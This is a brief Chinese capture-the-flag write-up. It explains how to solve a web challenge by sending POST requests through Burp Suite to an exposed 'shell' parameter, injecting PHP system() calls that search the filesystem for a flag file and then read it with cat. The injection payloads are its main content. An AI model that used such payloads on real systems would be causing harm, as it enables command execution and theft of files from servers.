1,從提示上可以看出是post方法提交變量shell。
2,burpsuite抓包,發送至repeater。修改為post方法,消息頭中添加Content-Type: application/x-www-form-urlencoded。
消息體中寫shell=system('find / -name flag*');
從response中可以看到查詢到flag.txt。
3,post方法不變,修改shell=system('cat /var/www/html/flag.txt'),發送消息。得到flag。